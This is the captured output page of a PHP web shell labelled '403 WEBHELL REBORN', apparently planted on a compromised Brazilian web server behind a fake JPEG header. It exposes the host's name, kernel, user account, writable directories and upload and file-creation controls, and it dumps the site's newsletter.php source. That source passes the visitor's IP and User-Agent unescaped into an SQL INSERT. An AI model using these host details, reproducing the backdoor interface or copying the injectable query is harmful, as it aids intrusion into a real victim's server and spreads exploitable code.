ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache
System : Linux cloud.heroica.com.br 4.18.0-553.36.1.el8_10.x86_64 #1 SMP Wed Jan 22 03:07:54 EST 2025 x86_64
User : farolpborg ( 1053)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/farolpborg/public_html/_ui/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /home/farolpborg/public_html/_ui/newsletter.php
<?
require "../_configs/config.php";

$email 		= mysqli_real_escape_string($conecta, trim($_POST['email']));
$datahora	= date('Y-m-d H:i:s');
$ip 		= getenv('REMOTE_ADDR');
$navegador 	= getenv('HTTP_USER_AGENT');

$nome       = explode("@", $email, 2);
$pegar_nome = $nome[0];

if(!preg_match("/^[a-z0-9_\.\-]+@[a-z0-9_\.\-]*[a-z0-9_\-]+\.[a-z]{2,4}$/", $email)){
    echo '<span class="text-warning">Digite um E-mail válido!</span>';
} else {
    $chkema = mysqli_query($conecta, "SELECT * FROM emails WHERE email = '$email'");
    if(mysqli_num_rows($chkema) == 0){
        mysqli_query($conecta, "INSERT INTO emails (status, nome, email, datahora, ip, navegador) VALUES ('1', '$pegar_nome', '$email', '$datahora', '$ip', '$navegador')");
        echo '<span class="text-success">E-mail cadastrado com sucesso!</span>';
    } else {
        echo '<span class="text-info">Você já está cadastrado!</span>';
    }
}

?>

Anon7 - 2021